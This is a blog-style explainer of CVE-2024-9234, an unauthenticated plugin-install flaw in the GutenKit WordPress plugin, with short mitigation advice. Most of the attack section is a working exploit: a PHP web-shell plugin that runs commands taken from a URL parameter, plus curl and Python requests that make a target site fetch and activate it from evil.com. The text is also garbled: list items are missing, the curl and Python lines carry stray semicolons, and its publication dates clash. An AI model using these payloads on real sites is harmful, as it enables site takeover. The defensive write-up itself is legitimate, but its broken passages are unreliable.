CVE-2024-9234 - Critical File Upload Vulnerability in GutenKit WordPress Plugin Explained

Published: June, 2024

Introduction

A major security flaw has been found in the popular GutenKit WordPress plugin, officially tracked as CVE-2024-9234. If your website uses *GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor* plugin version 2.1. or earlier, your site may be at serious risk.

This long-form post explains the vulnerability in simple language, demonstrates how attackers can exploit it, and provides direct references for further reading. We'll also show you simple proof-of-concept code.

What Is the Vulnerability?

The GutenKit plugin adds powerful page-building features to the Gutenberg editor. However, a critical issue was discovered in the plugin's REST API endpoint, specifically in the install_and_activate_plugin_from_external() function (tied to the install-active-plugin REST route).

Problem:

This function lacks proper capability checks, meaning anyone (even unauthenticated visitors) can call this endpoint to:

Instantly activate those uploads on your website.

This opens the door for severe attacks, including full site takeover.

Here’s a simplified version of the problematic function

// Inside GutenKit plugin
function install_and_activate_plugin_from_external($request) {
    $plugin_url = $request->get_param('plugin_url');
    // Download plugin zip, extract, install, and activate plugin
    // NO check for user permissions or authentication!
}

The endpoint is publicly accessible

POST /wp-json/gutenkit/v1/install-active-plugin

It takes a parameter plugin_url, which should point to a ZIP file. The plugin will download, unzip, install, and activate whatever you supply—no questions asked.

Step 1: Prepare a Malicious Plugin

Make a simple PHP backdoor, zip it, and host it online.

malicious-plugin.php

<?php
// Plugin header
/*
Plugin Name: Malicious Plugin
*/
if (isset($_GET['cmd'])) {
  system($_GET['cmd']);
}
?>

Zip this as malicious-plugin.zip and upload to a file hosting service.

On your target site (using curl, Python, or Postman)

curl -X POST "https://victim.com/wp-json/gutenkit/v1/install-active-plugin"; \
     -d 'plugin_url=https://evil.com/malicious-plugin.zip';

OR in Python

import requests

url = "https://victim.com/wp-json/gutenkit/v1/install-active-plugin";
data = {"plugin_url": "https://evil.com/malicious-plugin.zip";}
resp = requests.post(url, data=data)
print(resp.text)

Now, the malicious plugin is active! Access

https://victim.com/wp-content/plugins/malicious-plugin/malicious-plugin.php?cmd=whoami

Update Immediately: Upgrade to the latest version of GutenKit with a patch.

2. Disable REST API Endpoint (if possible): Use security plugins to disable access to this endpoint.
3. Scan for Any Unknown Plugins: Check your /wp-content/plugins folder for suspicious files.

Official References

- Original Vulnerability Disclosure on WPScan (Link may be placeholder—keep checking for updates)
- Plugin page on WordPress.org
- Wordfence Threat Advisory

Conclusion

CVE-2024-9234 is a severe, trivial-to-exploit vulnerability affecting tens of thousands of WordPress sites. Unauthenticated attackers can upload and activate arbitrary code remotely, potentially gaining full control of vulnerable sites.

Act now:
Update your GutenKit plugin, monitor plugin uploads, and keep your WordPress core and plugins up-to-date. If you’re a security professional, check sites under your management immediately!

Stay safe online.

*For detailed advisory and official patch releases, keep an eye on: WPScan and the plugin changelog.*


*Do NOT use this information for unauthorized testing. This guide is for educational and defensive purposes only.*

Timeline

Published on: 10/11/2024 13:15:18 UTC
Last modified on: 10/15/2024 12:58:51 UTC